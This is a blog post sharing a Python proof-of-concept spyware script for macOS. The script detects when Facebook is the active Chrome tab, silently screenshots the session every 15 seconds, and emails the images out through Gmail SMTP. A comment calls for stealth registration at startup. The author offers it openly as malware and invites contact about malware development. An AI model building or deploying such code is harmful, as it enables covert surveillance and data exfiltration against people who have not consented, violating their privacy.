Mac OSX Spyware – Facebook Activity Monitor

Introduction

This is a simple POC/Program that allows you to monitor a users Facebook session by taking screen captures of it every 15 seconds when the user is active on the site. I recommend using an e-mail specifically for logging a users session because the program will flood your inbox with e-mails. I’m looking at implementing the PIL to compress multiple images into a single GIF image and sending that once every hour, however using PIL requires an external library which is not ideal. Anyway now that I gave you the low down on the program lets take a look at the code!

POC

#!/usr/bin/python
"""
This program logs a Mac Users Facebook activity and then emails you the screenshot logs once a day.
"""

#imports
import os
import sys
import subprocess
import time
import glob
from time import gmtime, strftime
from AppKit import NSWorkspace
import smtplib
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email import Encoders

#gmail login information, replace with your own
gmail_user = "ianmarmour@gmail.com"
gmail_pwd = "XXXXXXXXXXX"

#Insert function here to register the script to run at startup in stealth, simple using applescript.

#Main while loop, runs all functions of the program.
while 1:
	#checks for the open tab in Google Chrome using Applescript
	opentab = os.popen("osascript -e \'tell application \"Google Chrome\" to get URL of active tab of window 1\'").read()
	facebook = "facebook"
	decision = opentab.find(facebook)
	activeAppName = NSWorkspace.sharedWorkspace().activeApplication()['NSApplicationName']

	#determines if you have facebook and google chrome open and in focus
	if (decision != -1) and (activeAppName == "Google Chrome"):
		time1 = strftime("%Y-%m-%d")
		time2 = strftime("%H:%M:%S")

		timestamp = "Facebook_at_" + time1 + "_" + time2 + ".png"
		#Takes a screencapture with the timestamp of your Facebook Session
		os.system("screencapture -x " + timestamp)
		time.sleep(15)

		#Sends E-Mail using your G-Mail credentials, with the screenshot as an attachment.
		def mail(to, subject, text, attach):
		   msg = MIMEMultipart()

		   msg['From'] = gmail_user
		   msg['To'] = to
		   msg['Subject'] = subject

		   msg.attach(MIMEText(text))

		   part = MIMEBase('application', 'octet-stream')
		   part.set_payload(open(attach, 'rb').read())
		   Encoders.encode_base64(part)
		   part.add_header('Content-Disposition',
		           'attachment; filename="%s"' % os.path.basename(attach))
		   msg.attach(part)

		   mailServer = smtplib.SMTP("smtp.gmail.com", 587)
		   mailServer.ehlo()
		   mailServer.starttls()
		   mailServer.ehlo()
		   mailServer.login(gmail_user, gmail_pwd)
		   mailServer.sendmail(gmail_user, to, msg.as_string())
		   # Should be mailServer.quit(), but that crashes...
		   mailServer.close()

		mail("ianmarmour@gmail.com",
		   "Hello from python!",
		   "This is a email sent with python",
		   timestamp )

		continue

If you have any questions regarding Mac OSX Malware development using Python feel free to contact me at ianmarmour@gmail.com or send me a direct message on Twitter using @ianmarmour!!!